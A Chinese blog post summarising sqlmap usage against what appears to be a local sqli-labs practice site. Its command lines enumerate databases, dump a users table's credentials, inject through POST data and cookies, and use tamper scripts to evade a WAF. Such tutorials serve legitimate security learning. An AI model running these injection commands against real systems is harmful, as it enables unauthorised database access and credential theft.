网络与信息安全信息安全Web安全

sqlmap使用总结

2018-12-29  本文已影响3人  原来是老王

sqlmap是全面的注入工具


最简单形式


#Get 
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --batch
#爆数据库
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --dbs
#爆表名
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security --tables
#爆列名
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security -T users --columns
#dump数据
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security -T users -C id,username,password --dump

post,cookies


python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-11/" --data="uname=admin&passwd=admin&submit=Submit" --cookie="XIc6_2132_saltkey=g5N5rRBz; SESS2a7db910cd5249ca3016afc519d2d9bf=OFwfZCCwgO8XF5bYygJsUNy__-kwXuDVk2birG42BVA" --batch

从文件中读取


最好用,(可以burpsuite抓包,保存到文件中如:in.txt)

python27 sqlmap.py -r in.txt --batch

指定参数


指定存在漏洞的参数,适合猜测或者手动分析过

python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-11/" --data="uname=admin&passwd=admin&submit=Submit" -p passwd --batch

指定注入的方式


适合手动测试过,特别是sqlmap会优先用time-based而不是union select

python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --technique U --batch --dbs
#B, E, Q, S, T, U

指定注入位置


“ * “号指定注入的指定位置
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1*+--+" --batch

tamper绕过waf


tamper绕过waf,可以尝试使用不同的tamper来绕过waf,保存在tamper目录下

python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --tamper=space2comment --batch

其他参数


可以直接sqlmap -h 或者 sqlmap -hh查看下,有需要可以尝试下

上一篇下一篇

猜你喜欢

热点阅读